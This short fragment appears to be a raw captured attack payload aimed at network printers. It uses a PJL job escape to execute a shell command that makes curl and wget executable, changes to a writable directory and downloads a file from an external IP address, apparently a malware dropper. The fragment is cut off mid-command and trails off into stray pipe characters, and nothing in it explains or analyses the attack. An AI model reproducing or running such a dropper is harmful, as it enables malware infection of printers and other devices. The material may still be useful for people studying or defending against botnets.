%-12345X@PJL JOB @PJL EXEC +sh -c "(chmod +x /usr/bin/curl; chmod +x /usr/bin/wget; cd /tmp||cd /var/run||cd /mnt||cd /root||cd /; wget -q --tries=3 --timeout=10 -O cumshotnews http://166.0.192.57/cumshotnews; curl -fsSL --connect-timeout 10 -o cumshotne |
|||||||